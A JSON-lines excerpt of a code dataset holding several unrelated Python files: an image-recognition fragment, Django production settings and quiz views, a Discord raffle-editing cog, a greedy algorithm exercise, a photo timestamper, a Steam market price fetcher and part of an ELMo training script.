miny, maxy, A))\r\n sys.setrecursionlimit(2000)\r\n for i in range(len(nums)):\r\n temp = fillout(nums[i].A) + nums[i].A\r\n if matsum(temp) == nums[i].A.n*nums[i].A.m:\r\n nums[i].pos = [1,2,3,5,7,'-']\r\n if lineV(nums[i].A):\r\n nums[i].pos = [1]\r\n else:\r\n nums[i].pos = [2,3,5,7,'-']\r\n if isMinus(nums[i].A):\r\n nums[i].pos = ['-']\r\n else:\r\n nums[i].pos = [2,3,5,7]\r\n else:\r\n nums[i].pos = [0,4,6,8,9]\r\n if lineV(nums[i].A):\r\n nums[i].pos = [4]\r\n else:\r\n nums[i].pos = [0,6,8,9]\r\n if max(intersectiony(nums[i].A)) == 2:\r\n nums[i].pos = [0]\r\n else:\r\n nums[i].pos = [6,8,9]\r\n # now check where 0 start from top and bottom if ave in higher half, 9, lower half, 6\r\n xy = temp.index(0)\r\n tempp = fill(temp, temp, xy[0], xy[1])\r\n print(tempp)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"engineer/ImageRecognition/imageRead.py","file_name":"imageRead.py","file_ext":"py","file_size_in_byte":13895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"641328562","text":"import os\n\nfrom .base import * # noqa: F401,F403\n\n\nCSRF_COOKIE_SECURE = True\nDEBUG = os.environ.get('DEBUG', False)\nSECURE_BROWSER_XSS_FILTER = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_HSTS_INCLUDE_SUBDOMAINS = True\nSECURE_HSTS_PRELOAD = True\nSECURE_HSTS_SECONDS = 3600\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nX_FRAME_OPTIONS = 'DENY'\n\nALLOWED_HOSTS = os.environ['ALLOWED_HOSTS'].split(' ')\nSECRET_KEY = os.environ['SECRET_KEY']\n\nRAVEN_CONFIG = {\n 'dsn': os.environ['RAVEN_DSN'],\n 'environment': os.environ.get('ENV', 'production'),\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'level': 'WARNING',\n 'handlers': ['sentry'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module) %(process)d %(thread)d %(message)s',\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'WARNING',\n 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',\n 'tags': {'custom-tag': 'x'},\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n }\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'WARNING',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n","sub_path":"config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"244365623","text":"import asyncio\nimport contextlib\nfrom typing import Union\n\nimport discord\nfrom redbot.core import commands\nfrom redbot.core.i18n import Translator\nfrom redbot.core.utils.chat_formatting import box\nfrom redbot.core.utils.menus import start_adding_reactions\nfrom redbot.core.utils.predicates import MessagePredicate, ReactionPredicate\n\nfrom ...mixins.abc import RaffleMixin\nfrom ...mixins.metaclass import MetaClass\nfrom ...utils.converters import RaffleFactoryConverter\nfrom ...utils.enums import RaffleComponents\nfrom ...utils.exceptions import InvalidArgument, RaffleError\nfrom ...utils.formatting import cross, tick\nfrom ...utils.helpers import (\n cleanup_code,\n format_traceback,\n raffle_safe_member_scanner,\n start_interactive_message_session,\n validator,\n)\nfrom ...utils.parser import RaffleManager\n\n_ = Translator(\"Raffle\", __file__)\n\n\nclass EditorCommands(RaffleMixin, metaclass=MetaClass):\n \"\"\"Mixin for commands under ``[p]raffle edit``.\"\"\"\n\n @commands.group()\n async def raffle(self, ctx):\n pass\n\n @raffle.group()\n async def edit(self, ctx):\n \"\"\"Edit the settings for a raffle.\"\"\"\n pass\n\n @edit.command()\n async def accage(self, ctx, raffle: RaffleFactoryConverter, new_account_age: Union[int, bool]):\n \"\"\"Edit the account age requirement for a raffle.\n\n Use `0` or `false` to disable this condition.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new account age requirement.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if isinstance(new_account_age, bool):\n if not new_account_age:\n with contextlib.suppress(KeyError):\n del raffle_data[\"account_age\"]\n return await ctx.send(_(\"Account age requirement removed from this raffle.\"))\n else:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable this condition.')\n )\n\n try:\n RaffleManager.parse_accage(new_account_age)\n except InvalidArgument as e:\n return await ctx.send(format_traceback(e))\n\n raffle_data[\"account_age\"] = new_account_age\n await ctx.send(_(\"Account age requirement updated for this raffle.\"))\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def convertsimple(self, ctx, raffle: RaffleFactoryConverter):\n \"\"\"Convert a raffle to a simple one (name and description).\n\n **Arguments**\n - `` - The name of the raffle.\n \"\"\"\n components = [e.name for e in RaffleComponents][2:]\n\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n message = _(\n \":warning: Are you sure you want to convert this raffle to a simple raffle?\\n\"\n \"It will remove all the conditions!\"\n )\n\n can_react = ctx.channel.permissions_for(ctx.me).add_reactions\n if not can_react:\n message += \" (y/n)\"\n message = await ctx.send(message)\n\n if can_react:\n start_adding_reactions(message, ReactionPredicate.YES_OR_NO_EMOJIS)\n predicate = ReactionPredicate.yes_or_no(message, ctx.author)\n event_type = \"reaction_add\"\n else:\n predicate = MessagePredicate.yes_or_no(ctx)\n event_type = \"message\"\n\n try:\n await self.bot.wait_for(event_type, check=predicate, timeout=30)\n except asyncio.TimeoutError:\n await ctx.send(_(\"You took too long to respond.\"))\n\n if predicate.result:\n delkeys = []\n for k in raffle_data.keys():\n if k in components:\n delkeys.append(k)\n for k in delkeys:\n del raffle_data[k]\n await ctx.send(_(\"Raffle converted to simple raffle.\"))\n\n else:\n await ctx.send(_(\"No changes have been made.\"))\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def serverjoinage(\n self, ctx, raffle: RaffleFactoryConverter, new_server_join_age: Union[int, bool]\n ):\n \"\"\"Edit the server join age requirement for a raffle.\n\n Use `0` or `false` to disable this condition.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new join age requirement.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if not new_server_join_age:\n with contextlib.suppress(KeyError):\n del raffle_data[\"server_join_age\"]\n return await ctx.send(_(\"Server join age requirement removed from this raffle.\"))\n\n elif new_server_join_age is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable this condition.')\n )\n\n else:\n try:\n RaffleManager.parse_serverjoinage(ctx, new_server_join_age)\n except InvalidArgument as e:\n return await ctx.send(format_traceback(e))\n\n raffle_data[\"server_join_age\"] = new_server_join_age\n await ctx.send(_(\"Server join age requirement updated for this raffle.\"))\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def description(\n self, ctx, raffle: RaffleFactoryConverter, *, description: Union[bool, str]\n ):\n \"\"\"Edit the description for a raffle.\n\n Use `0` or `false` to remove this feature.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new description.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if not description:\n with contextlib.suppress(KeyError):\n del raffle_data[\"description\"]\n return await ctx.send(_(\"Description removed from this raffle.\"))\n\n elif description is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable the description.')\n )\n\n else:\n raffle_data[\"description\"] = description\n await ctx.send(_(\"Description updated for this raffle.\"))\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def stimer(self, ctx, raffle: RaffleFactoryConverter, suspense_timer: Union[int, bool]):\n \"\"\"Edit the suspense timer for a raffle.\n\n Use `0` or `false` to remove this feature.\n This feature defaults to 2 seconds if not set.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new suspense timer.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if not suspense_timer:\n with contextlib.suppress(KeyError):\n del raffle_data[\"suspense_timer\"]\n return await ctx.send(_(\"Suspense timer reset to the default: 2 seconds.\"))\n\n elif suspense_timer is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable the description.')\n )\n\n else:\n if not suspense_timer in [*range(0, 11)]:\n await ctx.send(\"New suspense timer must be a number between 0 and 10.\")\n raffle_data[\"suspense_timer\"] = suspense_timer\n await ctx.send(_(\"Suspense timer updated for this raffle.\"))\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def endaction(\n self, ctx, raffle: RaffleFactoryConverter, *, on_end_action: Union[bool, str]\n ):\n \"\"\"Edit the on_end_action for a raffle.\n\n Use `0` or `false` to remove this feature.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new action. Must be one of `end`, `remove_winner`, 'remove_and_prevent_winner', or `keep_winner`.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if not on_end_action:\n with contextlib.suppress(KeyError):\n del raffle_data[\"on_end_action\"]\n return await ctx.send(_(\"On end action reset to the default: `keep_winner`.\"))\n\n elif on_end_action is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable the description.')\n )\n\n else:\n if not on_end_action in (\n \"end\",\n \"remove_winner\",\n \"remove_and_prevent_winner\",\n \"keep_winner\",\n ):\n return await ctx.send(\n _(\n \"Please provide one of `end`, `remove_winner`, `remove_and_prevent_winner`, or `keep_winner`.\"\n )\n )\n raffle_data[\"on_end_action\"] = on_end_action\n await ctx.send(_(\"On end action updated for this raffle.\"))\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def maxentries(\n self, ctx, raffle: RaffleFactoryConverter, maximum_entries: Union[int, bool]\n ):\n \"\"\"Edit the max entries requirement for a raffle.\n\n Use `0` or `false` to disable this condition.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new maximum number of entries.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if not maximum_entries:\n with contextlib.suppress(KeyError):\n del raffle_data[\"maximum_entries\"]\n return await ctx.send(_(\"Maximum entries condition removed from this raffle.\"))\n\n elif maximum_entries is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable this condition.')\n )\n\n else:\n raffle_data[\"maximum_entries\"] = maximum_entries\n await ctx.send(_(\"Max entries requirement updated for this raffle.\"))\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def endmessage(\n self, ctx, raffle: RaffleFactoryConverter, *, end_message: Union[bool, str]\n ):\n \"\"\"Edit the end message of a raffle.\n\n Once you provide an end message, you will have the chance\n to add additional messages, which will be selected at random\n when a winner is drawn.\n\n Use `0` or `false` to disable this condition.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new ending message.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if not end_message:\n with contextlib.suppress(KeyError):\n del raffle_data[\"end_message\"]\n return await ctx.send(\n _(\"End message feature removed from this raffle. It will now use the default.\")\n )\n\n elif end_message is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable this condition.')\n )\n\n else:\n try:\n raffle_safe_member_scanner(end_message, \"end_message\")\n except InvalidArgument as e:\n return await ctx.send(format_traceback(e))\n\n message = _(\n \"Would you like to add additional end messages to be selected from at random?\"\n )\n\n can_react = ctx.channel.permissions_for(ctx.me).add_reactions\n if not can_react:\n message += \" (y/n)\"\n message = await ctx.send(message)\n if can_react:\n start_adding_reactions(message, ReactionPredicate.YES_OR_NO_EMOJIS)\n predicate = ReactionPredicate.yes_or_no(message, ctx.author)\n event_type = \"reaction_add\"\n else:\n predicate = MessagePredicate.yes_or_no(ctx)\n event_type = \"message\"\n\n try:\n await self.bot.wait_for(event_type, check=predicate, timeout=30)\n except asyncio.TimeoutError:\n await ctx.send(\n _(\n 'You took too long to respond. Saving end message as \"{}\".'.format(\n end_message\n )\n )\n )\n\n if predicate.result:\n interaction = await start_interactive_message_session(\n ctx, self.bot, \"end_message\", message\n )\n if interaction is False:\n data = end_message\n await ctx.send(\n _(\n \"End message set to what you provided previously: {}\".format(\n end_message\n )\n )\n )\n else:\n data = [end_message] + interaction\n await ctx.send(_(\"End messages updated for this raffle.\"))\n else:\n data = end_message\n await ctx.send(_(\"End message updated for this raffle.\"))\n raffle_data[\"end_message\"] = data\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def joinmessage(\n self, ctx, raffle: RaffleFactoryConverter, *, join_message: Union[bool, str]\n ):\n \"\"\"Edit the join message of a raffle.\n\n Once you provide a join message, you will have the chance\n to add additional messages, which will be selected at random\n when a user joins the raffle.\n\n Use `0` or `false` to disable this condition.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new joining message.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if not join_message:\n with contextlib.suppress(KeyError):\n del raffle_data[\"join_message\"]\n return await ctx.send(\n _(\n \"Join message feature removed from this raffle. It will now use the default.\"\n )\n )\n\n elif join_message is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable this condition.')\n )\n\n else:\n try:\n raffle_safe_member_scanner(join_message, \"join_message\")\n except InvalidArgument as e:\n return await ctx.send(format_traceback(e))\n\n message = _(\n \"Would you like to add additional end messages to be selected from at random?\"\n )\n\n can_react = ctx.channel.permissions_for(ctx.me).add_reactions\n if not can_react:\n message += \" (y/n)\"\n message = await ctx.send(message)\n if can_react:\n start_adding_reactions(message, ReactionPredicate.YES_OR_NO_EMOJIS)\n predicate = ReactionPredicate.yes_or_no(message, ctx.author)\n event_type = \"reaction_add\"\n else:\n predicate = MessagePredicate.yes_or_no(ctx)\n event_type = \"message\"\n\n try:\n await self.bot.wait_for(event_type, check=predicate, timeout=30)\n except asyncio.TimeoutError:\n await ctx.send(\n _(\n 'You took too long to respond. Saving join message as \"{}\".'.format(\n join_message\n )\n )\n )\n\n if predicate.result:\n interaction = await start_interactive_message_session(\n ctx, self.bot, \"join_message\", message\n )\n if interaction is False:\n data = join_message\n await ctx.send(\n _(\n \"Join message set to what you provided previously: {}\".format(\n join_message\n )\n )\n )\n else:\n data = [join_message] + interaction\n await ctx.send(_(\"Join messages updated for this raffle.\"))\n else:\n data = join_message\n await ctx.send(_(\"Join message updated for this raffle.\"))\n raffle_data[\"join_message\"] = data\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def fromyaml(self, ctx, raffle: RaffleFactoryConverter):\n \"\"\"Edit a raffle directly from yaml.\n\n **Arguments:**\n - `` - The name of the raffle to edit.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n existing_data = {\n \"end_message\": raffle_data.get(\"end_message\", None),\n \"join_message\": raffle_data.get(\"join_message\", None),\n \"account_age\": raffle_data.get(\"account_age\", None),\n \"server_join_age\": raffle_data.get(\"server_join_age\", None),\n \"roles_needed_to_enter\": raffle_data.get(\"roles_needed_to_enter\", None),\n \"badges_needed_to_enter\": raffle_data.get(\"badges_needed_to_enter\", None),\n \"prevented_users\": raffle_data.get(\"prevented_users\", None),\n \"allowed_users\": raffle_data.get(\"allowed_users\", None),\n \"description\": raffle_data.get(\"description\", None),\n \"maximum_entries\": raffle_data.get(\"maximum_entries\", None),\n \"on_end_action\": raffle_data.get(\"on_end_action\", None),\n \"suspense_timer\": raffle_data.get(\"suspense_timer\", None),\n }\n\n message = (\n _(\n \"You're about to **edit an existing raffle**.\\n\\nThe `name` \"\n \"block cannot be edited through this command, it's preferred \"\n \"if you create a new raffle with the new name instead.\\nYou can end \"\n \"this raffle through using `{prefix}raffle end {raffle}`.\"\n \"\\nPlease consider reading the docs about the various \"\n \"conditional blocks if you haven't already.\\n\\n\".format(\n prefix=ctx.clean_prefix, raffle=raffle\n )\n )\n + self.docs\n )\n\n quotes = lambda x: f'\"{x}\"'\n noedits = lambda x: _(\"{x} # Cannot be edited\".format(x=x))\n relevant_data = [(\"name\", noedits(quotes(raffle)))]\n for k, v in raffle_data.items():\n if k in (\"owner\", \"entries\", \"created_at\"):\n # These are not user defined keys\n continue\n if isinstance(v, str):\n v = quotes(v)\n relevant_data.append((k, v))\n\n message += _(\n \"\\n\\n**Current settings:**\"\n + box(\"\\n\".join(f\"{x[0]}: {x[1]}\" for x in relevant_data), lang=\"yaml\")\n )\n await ctx.send(message)\n\n check = lambda x: x.channel == ctx.channel and x.author == ctx.author\n\n try:\n content = await self.bot.wait_for(\"message\", timeout=500, check=check)\n except asyncio.TimeoutError:\n with contextlib.suppress(discord.NotFound):\n await message.delete()\n\n content = content.content\n valid = validator(cleanup_code(content))\n\n if not valid:\n return await ctx.send(\n _(\n \"Please provide valid YAML. You can validate your raffle YAML using `{}raffle parse`.\".format(\n ctx.clean_prefix\n )\n )\n )\n\n valid[\"name\"] = raffle\n\n try:\n parser = RaffleManager(valid)\n parser.parser(ctx)\n except RaffleError as e:\n exc = cross(_(\"An exception occured whilst parsing your data.\"))\n return await ctx.send(exc + format_traceback(e))\n\n data = {\n \"owner\": raffle_data.get(\"owner\"),\n \"entries\": raffle_data.get(\"entries\"),\n }\n\n if raffle_data.get(\"created_at\", None):\n data[\"created_at\"] = raffle_data[\"created_at\"]\n\n conditions = {\n \"end_message\": valid.get(\"end_message\", None),\n \"join_message\": valid.get(\"join_message\", None),\n \"account_age\": valid.get(\"account_age\", None),\n \"server_join_age\": valid.get(\"server_join_age\", None),\n \"roles_needed_to_enter\": valid.get(\"roles_needed_to_enter\", None),\n \"badges_needed_to_enter\": valid.get(\"badges_needed_to_enter\", None),\n \"prevented_users\": valid.get(\"prevented_users\", None),\n \"allowed_users\": valid.get(\"allowed_users\", None),\n \"description\": valid.get(\"description\", None),\n \"maximum_entries\": valid.get(\"maximum_entries\", None),\n \"on_end_action\": valid.get(\"on_end_action\", None),\n \"suspense_timer\": valid.get(\"suspense_timer\", None),\n }\n\n for k, v in conditions.items():\n if v:\n data[k] = v\n\n async with self.config.guild(ctx.guild).raffles() as r:\n r[raffle] = data\n\n additions = []\n deletions = []\n changes = []\n\n for k, v in conditions.items():\n if v and not existing_data[k]:\n additions.append(k)\n continue\n if not v and existing_data[k]:\n deletions.append(k)\n continue\n if v != existing_data[k]:\n changes.append(k)\n continue\n\n if any([additions, deletions, changes]):\n message = \"\"\n if additions:\n message += _(\"Added:\\n\") + \"\\n\".join(f\"+ {a}\" for a in additions)\n if changes:\n message += _(\"\\n\\nEdited:\\n\") + \"\\n\".join(f\"> {c}\" for c in changes)\n if deletions:\n message += _(\"\\n\\nRemoved:\\n\") + \"\\n\".join(f\"- {d}\" for d in deletions)\n\n diffs = box(message, lang=\"diff\")\n update = tick(_(\"Raffle edited. {}\".format(diffs)))\n\n else:\n update = tick(_(\"No changes were made.\"))\n\n await ctx.send(update)\n\n await self.clean_guild_raffles(ctx)\n","sub_path":"raffle/commands/editor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566468343","text":"'''Min Operations\r\nStarting from the number 0, find the minimum number of operations \r\nrequired to reach a given positive target number. You can only use \r\nthe following two operations:\r\n\r\n1. Add 1\r\n2. Double the number'''\r\n\r\n'''For Target = 18, output = 6, because it takes at least 6 steps \r\nshown below to reach the target\r\n\r\nstart = 0\r\nstep 1 ==> 0 + 1 = 1\r\nstep 2 ==> 1 * 2 = 2 # or 1 + 1 = 2\r\nstep 3 ==> 2 * 2 = 4\r\nstep 4 ==> 4 * 2 = 8\r\nstep 5 ==> 8 + 1 = 9\r\nstep 6 ==> 9 * 2 = 18'''\r\n\r\ndef min_operation(target: int) -> int:\r\n steps = 0\r\n while target != 0:\r\n while (target/2) == (target//2):\r\n target = target //2 \r\n steps +=1\r\n \r\n target -=1\r\n steps +=1\r\n \r\n return steps\r\n\r\n\r\n# Test Cases\r\n\r\ndef test_function(test_case):\r\n target = test_case[0]\r\n solution = test_case[1]\r\n output = min_operation(target)\r\n \r\n if output == solution:\r\n print(\"Pass\")\r\n else:\r\n print(\"Fail\")\r\n\r\n\r\ntarget = 18\r\nsolution = 6\r\ntest_case = [target, solution]\r\ntest_function(test_case)","sub_path":"ds and algo/Greedy_Algo/min_operation.py","file_name":"min_operation.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586650978","text":"# This code is written for usage in subject TPR2251 Pattern Recognition. \r\n# You may modify the parameters to suit your needs\r\n# This code is a modified version of timestamp_png.py, to extract the creation time from the filename\r\n\r\n# See https://stackoverflow.com/a/39501288 for explanation on getting the creation time. \r\n# See https://pillow.readthedocs.io/en/stable/ for documentation of the PIL library\r\n\r\nimport os\r\nimport time\r\nimport re\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n\r\ndef timestamp_photo(input_photo, output_photo, text, pos):\r\n \"\"\"\r\n The timestamp_photo function take four arguments, and will return with at and saved it as . \r\n \r\n You may modify the font family, font size and the font color according to your need. \r\n \"\"\"\r\n photo = Image.open(input_photo)\r\n\r\n # make the image editable\r\n drawing = ImageDraw.Draw(photo)\r\n\r\n font = ImageFont.truetype(r\"C:\\Windows\\Fonts\\Arial.ttf\", 60)\r\n drawing.text(pos, text, fill = \"black\", font = font) # change \"fill\" to white for images with dark background\r\n photo.save(output_photo)\r\n\r\ndef photo_created_time(filename):\r\n \"\"\"\r\n The created_time function is used to return the creation time of the files based on the filename. \r\n \r\n My filename format: \"IMG_YYYYMMDD_HHMMSS.jpg\"\r\n \"\"\"\r\n basename = os.path.basename(filename)\r\n formatted_basename = basename.split('_')\r\n datetime = formatted_basename[1] + \" \" + formatted_basename[2][:-4] # [:-4] to exclude the file extension\r\n return datetime\r\n\r\n\r\ncount = 1\r\nfor photo in os.listdir(\"Train Set\"): # change \"folder\" to the path to your folder\r\n path = \"Train Set/\" + photo\r\n created_time = photo_created_time(path)\r\n output_name = \"Stamped/\" + str(count) + \".png\"\r\n \r\n timestamp_photo(path, output_name, str(created_time), pos=(5, 5))\r\n count += 1\r\n \r\nprint(\"All timestamp added. \")","sub_path":"timestamp_filename_png.py","file_name":"timestamp_filename_png.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"426839827","text":"import requests\nimport json\n\ndata = {}\nfile = 'price.json'\n\ndef fixed_name(item_name):\n return item_name.replace(' ', '%20')\n\ndef get_item(appid, item_name):\n r = requests.get('https://steamcommunity.com/market/priceoverview/?currency=1&appid={}&market_hash_name={}'.format(appid, fixed_name(item_name))).json()\n if(r['success'] == True):\n data[item_name] = {\n 'lowest_price': r['lowest_price'],\n 'median_price': r['median_price']\n }\n return data\n else:\n return False\n\ndef get_lowest_price(appid, item_name):\n r = requests.get('https://steamcommunity.com/market/priceoverview/?currency=1&appid={}&market_hash_name={}'.format(appid, fixed_name(item_name))).json()\n if(r['success'] == True):\n return r['lowest_price']\n else:\n return False\n\ndef get_median_price(appid, item_name):\n r = requests.get('https://steamcommunity.com/market/priceoverview/?currency=1&appid={}&market_hash_name={}'.format(appid, fixed_name(item_name))).json()\n if(r['success'] == True):\n return r['median_price']\n else:\n return False\n\ndef get_volume(appid, item_name):\n r = requests.get('https://steamcommunity.com/market/priceoverview/?currency=1&appid={}&market_hash_name={}'.format(appid, fixed_name(item_name))).json()\n if(r['success'] == True):\n return r['volume'].replace(',', '')\n else:\n return False\n\nitem = 'Mann Co. Supply Crate Key'\n\nprint(get_item(440, item))\nprint(get_volume(440, item))\nprint(get_lowest_price(440, item))\nprint(get_median_price(440, item))\n\nwith open(file, 'w') as outfile:\n json.dump(data, outfile, indent=4)\n","sub_path":"get_community_market_price.py","file_name":"get_community_market_price.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"579142514","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.views import generic\nfrom django.utils import timezone\nfrom django.forms import ModelForm\nimport pdb\n\nfrom creator.models import Quiz, Question, Choice\n\nclass IndexView(generic.ListView):\n template_name = 'creator/index.html'\n context_object_name = 'quiz_list'\n\n def get_queryset(self):\n return Quiz.objects.all()\n\nclass QuizView(generic.DetailView):\n model = Quiz\n template_name = 'creator/quiz_detail.html'\n\nclass QuestionView(generic.DetailView):\n model = Question\n template_name = 'creator/question_detail.html'\n\nclass QuizForm(ModelForm):\n class Meta:\n model = Quiz\n exclude = ('pub_date',)\n\nclass QuestionForm(ModelForm):\n class Meta:\n model = Question\n exclude = ('quiz',)\n\ndef add_quiz(request):\n if request.method == 'GET':\n form = QuizForm()\n else:\n # A POST request: Handle Form Upload\n # Bind data from request.POST into a PostForm\n form = QuizForm(request.POST)\n # If data is valid, proceeds to create a new post and redirect the user\n if form.is_valid():\n # pdb.set_trace()\n title = form.cleaned_data['title']\n author = form.cleaned_data['author']\n description = form.cleaned_data['description']\n pub_date = timezone.now()\n quiz = Quiz.objects.create(title=title, author=author, description=description, pub_date=pub_date)\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('creator:add_quiz_success'))\n \n return render(request, 'creator/add_quiz.html', {\n 'form': form,\n })\n\ndef add_quiz_success(request):\n return render(request, 'creator/add_quiz_success.html')\n\ndef delete_quiz(request, quiz_id):\n q = Quiz.objects.get(pk=quiz_id)\n for question in q.question_set.all():\n for choice in question.choice_set.all():\n choice.delete()\n question.delete()\n q.delete()\n return HttpResponseRedirect(reverse('creator:delete_quiz_success'))\n\ndef delete_quiz_success(request):\n return render(request, 'creator/delete_quiz_success.html')\n\ndef add_question(request, quiz_id):\n quiz = Quiz.objects.get(pk=quiz_id)\n if request.method == 'GET':\n form = QuestionForm() \n else:\n form = QuestionForm(request.POST)\n if form.is_valid():\n text = form.cleaned_data['text']\n quiz = Question.objects.create(text=text, quiz=quiz)\n return HttpResponseRedirect(reverse('creator:quiz', args=(quiz_id,)))\n return render(request, 'creator/add_question.html', {\n 'form': form,\n 'quiz': quiz\n })","sub_path":"kukuba/creator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"159569629","text":"import argparse\nimport os\n\nimport sys\nsys.path.insert(0, os.path.abspath('.'))\nsys.path.insert(0, os.path.abspath('../'))\nsys.path.append(os.pardir)\n\nfrom bilm.training import train, load_vocab\nfrom bilm.data import BidirectionalLMDataset\nfrom train_config import config\n\n\ndef main(args):\n # load the vocab\n # vocab 의 최대 길이 토큰 = 10음절 --> 자모 변환 시 30음절\n # bos char + 30 + eos char = 32\n vocab = load_vocab(args.vocab_file, 32)\n\n # define the options\n # batch size for each GPU\n batch_size = 64*2\n n_gpus = 1\n\n # 연애의 과학 토크나이징된 카톡 데이터 (identified_corpus_20180105) unique 토큰 개수\n # (-> unique token 개수가 아닌 전체 토큰 수를 넣어야 함)\n # n_train_tokens = 609518\n # n_train_tokens = 626932956 # 8000pair_tokenized_corpus.txt에 등하는 토큰 수 (6.2억개)\n # 임시로 사용하고 있는 토큰 수\n n_train_tokens = 200000000\n\n options = {\n 'bidirectional': True,\n 'char_cnn': {\n 'activation': 'tanh',\n 'embedding': {'dim': 16},\n 'filters': [[1, 32],\n [2, 32],\n [3, 64],\n [4, 128],\n [5, 256],\n [6, 512],\n [7, 1024]],\n 'max_characters_per_token': 32,\n 'n_characters': 62,\n 'n_highway': 2,\n },\n 'dropout': 0.2,\n\n 'lstm': {\n 'cell_clip': 3,\n 'dim': 256,\n 'n_layers': 2,\n 'proj_clip': 3,\n 'projection_dim': 256,\n 'use_skip_connections': True,\n },\n\n 'all_clip_norm_val': 10.0,\n 'n_epochs': 10,\n 'n_train_tokens': n_train_tokens,\n 'batch_size': batch_size,\n 'n_tokens_vocab': vocab.size,\n 'unroll_steps': 10,\n 'n_negative_samples_batch': 4096,\n }\n\n prefix = args.train_prefix\n data = BidirectionalLMDataset(filepattern=prefix,\n vocab=vocab,\n test=False,\n shuffle_on_load=True,\n with_tab=False)\n tf_save_dir = args.save_dir\n tf_log_dir = args.save_dir\n train(options,\n data,\n n_gpus,\n tf_save_dir,\n tf_log_dir,\n restart_ckpt_file='/media/scatter/scatterdisk/elmo_ckpt/elmo_ckpt_0919_2142/model.ckpt_batch-625000')\n\n\nif __name__ == '__main__':\n from datetime import datetime\n os.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\n BASE_DIR = config['BASE_DIR']\n sol_paths_201801015 = config['sol_paths_201801015']\n textat_paths_201801015 = config['textat_paths_201801015']\n sol_data_pattern = os.path.join(BASE_DIR, sol_paths_201801015)\n textat_data_pattern = os.path.join(BASE_DIR, textat_paths_201801015)\n pingpong8000 = config['pingpong8000']\n filepattern = [sol_data_pattern, textat_data_pattern]\n\n now = datetime.now()\n 